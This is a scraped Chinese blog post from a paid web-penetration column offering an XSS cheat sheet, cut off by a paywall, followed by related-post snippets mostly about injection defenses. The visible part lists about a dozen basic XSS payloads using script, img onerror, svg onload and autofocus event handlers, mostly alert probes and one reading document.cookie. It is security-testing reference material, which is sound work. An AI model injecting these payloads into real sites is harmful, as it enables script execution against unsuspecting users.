【漏洞挖掘】——28、XSS Cheat-sheet

已于 2024-06-05 11:13:20 修改
阅读量802 收藏 3
点赞数
分类专栏: 【WEB渗透】 文章标签: xss 渗透测试 信息安全 网络安全 web渗透
于 2018-03-10 17:31:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/79509564
版权
【WEB渗透】 专栏收录该内容
151 篇文章 11 订阅 ¥29.90 ¥99.00
订阅专栏
本文深入探讨了XSS跨站脚本攻击,包括常见载荷、检查列表和各种测试方法。通过PortSwigger的XSS备忘录清单,以及介绍如何构造XSS载荷,为安全测试人员提供了实用的参考资料。
摘要由CSDN通过智能技术生成
文章前言

XSS(跨站脚本攻击)是一种常见的网络安全威胁,攻击者借助漏洞将恶意脚本注入到网页中以在用户浏览器上执行恶意操作,本文将对我们一些常用的XSS有效载荷进行介绍

常用载荷

下面是一些平时在进行XSS测试时常用的攻击载荷,主要划分为以下几类:

#标签类
<scirpt>alert("xss");</script>
<img src=x onerror=alert("xss");>
<img src=x οnerrοr=prompt(1);>
<img/src='x'/onclick=alert(document.cookie)><p>test<p>
<svg onload=alert("xss");>
<script>setTimeout(alert(88199),0)</script>
<script>document['write'](88199);</script>
<script>propmt("mamunwhh")</script>
<input onfocus="alert('xss');">
<input onfocus="alert('xss');" autofocus>
<input onblur=alert("xss") autofocus><input autofocus>
<details ontoggle="alert('xss');">
<details open ontoggle="alert('x
了解本专栏 订阅专栏 解锁全文
FLy_鹏程万里
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
XSS-Cheat-Sheet-2020-Edition.pdf
05-06
This cheat sheet is meant to be used by bug hunters, penetration testers, security analysts, web application security students and enthusiasts. It’s about Cross-Site Scripting (XSS), the most ...
XSS_Cheat_Sheet_2020_Edition:xss裂缝模糊测试payload的最佳集合2020版
03-19
XSS_Cheat_Sheet_2020_Edition简介白帽赏金平台xss突破模糊测试有效替代的最佳集合2020版该备忘清单可用于攻击猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的有效载荷,并观察响应内容,查找网络...
5种方法防止 jsp被sql注入
收集盒 Book box
09-22 6519
一、 SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。 ===========================================
防注入
yanick技术博客
09-01 698
string sql = "insert into 表名 values(@字段)";SqlParameter s = new SqlParameter("@字段", FileByteArray);SqlCommand cmd = new SqlCommand(sql, conn);//conn为SqlConnection实例对象cmd.Parameters.Add(s);conn.Open();c
JAVA Web应用常见漏洞与修复建议_基于dom的xss是将用户可控的javascript数据输出到html页面中而产生的漏洞,为了避
最新发布
2401_84969054的博客
05-17 468
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。[外链图片转存中…(img-xRVOqBcz-1715881670315)]
防注入攻击
weixin_30823227的博客
08-19 278
1、可以注入攻击的登录 package pers.jdbc.log; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement; import java.util.*; public class L...
防注入的办法
北极光的博客
09-06 388
这是网上搜来的防注入的办法: '检查URL输入 限制非法字符 url=LCase(request.querystring()) ip=request.ServerVariables("REMOTE_ADDR") pos1=instr(url,"%") pos2=instr(url,"'") pos3=instr(url,";") pos4=instr(url,"where")
数据库防注入攻击
xkjscm的博客
04-30 630
这是学习笔记: 在表单提交之后, 我们通过  $_POST   或者  $_GET 获取表单数据, 然后插入数据库,   例如 $age 和 $name  是从表单提交的数据,  $age 是整形,  $name 是String,  $age 需要在插入数据库之前使用   intval() 转换为整形, $name  需要在SQL语句中使用 单引号 引起来
XSS-Filter-Evasion-Cheat-Sheet
05-05
XSS Filter Evasion Cheat Sheet 是一个专门针对如何检测和规避XSS过滤器的实用指南。下面将详细探讨XSS攻击的基本原理、类型以及如何利用XSS Filter Evasion技巧进行防御。** ### XSS攻击的基本概念 1. **反射型...
XSS-Cheat-Sheet-2019-Edition-2 翻译版本
03-17
XSS-Cheat-Sheet-2019-Edition-2 翻译版本 是聪国外翻译过来的版本,XSS绕过
java猜数字源码-XSS-Filter-Evasion-Cheat-Sheet-CN:XSS_Filter_Evasion_Cheat_Sh
06-05
XSS Filter Evasion Cheat Sheet 中文版 译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常的价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的各种代码...
php中防止sql注入攻击
大鱼人不能忍烫金竹纤维短袖
01-17 782
(1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集  使用方法如下: $sql = "select count(*) as ctr from users where username='".mysql_real_escape_string($username)."' and password='". my
如何绝对防止注入
m0_50453514的博客
04-15 3736
前不久的候,发小 说不敢把自己的代码发到github上面,怕很多人找bug比较麻烦,我同也在思考一个问题,平审计或者黑盒的候都没有留意,总是想着如何进攻别人,现在换一个角度来总结一下,如何做到百分百防止注入呢,也许从这个角度学习会让我进步更快。
sql防注入几种惯用策略
L_yangliu的专栏
07-27 1312
所谓sql注入,是由表单提交,后台拼接sql语句造成的。如此,会给系统带来很大的破坏,甚至导致整个数据库被清掉,或删除。因此必须做好防注入操作。关于这个问题,成熟的方案有很多,现在总结如下: 一,从根源上解决问题,也就是在接受表单提交,要特别注意sql拼接处理可能带来的影响,避免给黑客留下突破口。 二,使用转义,经常用到的函数有:mysql_real_escape_string(php5已
Windows 软件安全---注入安全
MusicMan
07-17 1292
在Windows软件中,绝大多数软件都是exe文件,然后有很多动态链接库dll构成。所以很多黑客就可以通过dll注入的形式入侵软件,达到入侵甚至盗取密码的功能,接下来本人介绍一种方法,可以防止非法dll注入的一种方法,学识有限,如有不足,敬请指教。 介绍的方法是通过hook系统的ldrLoadDll方法,然后判断dll的名称,防止恶意dll注入。 原理如下: Inject Defense原理...
Web安全-代码注入
道阻且长,行则将至。
02-06 1433
概述 XML注入 XPath注入
项目实施之预防注入漏洞
weixin_33709590的博客
09-16 83
排查插入、更新及PAD日志是否有类似问题。另外,请按要求将SQL语句重构为传递参数形式,严格按参数方式构建SQL语句而不是拼接SQL,这个不仅仅是预防注入漏洞的问题,还有性能的考虑。拼接的每条语句都会需要数据库重新解析,而SQL参数形式不需要重新解析。...
最友好的SQL注入防御方法(转)
cuemes08808的博客
05-25 150
最友好的SQL注入防御方法(转)  不知道是不是有些人给SQL注入吓怕了,把一大堆根本对系统安全没威胁的字符(比如"号,%号等)都过滤了(甚至NB联盟有些人居然也这样做),使得一些系统的User Interface极不友好,经常...
android app代码审计,常规漏洞/缺陷整理(持续更新)
qq_29194615的博客
04-21 4687
android app代码审计,常规漏洞/缺陷整理(持续更新)
DOM-XSS漏洞挖掘与攻击面全面解析
常见的DOM-XSS漏洞位置包括: 1. URL代入页面: 在页面加载,某些用户输入字段可能导致URL被恶意注入,如搜索框、表单提交等。攻击者通过构造恶意URL,利用location.href属性获取location.search和location.hash中...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值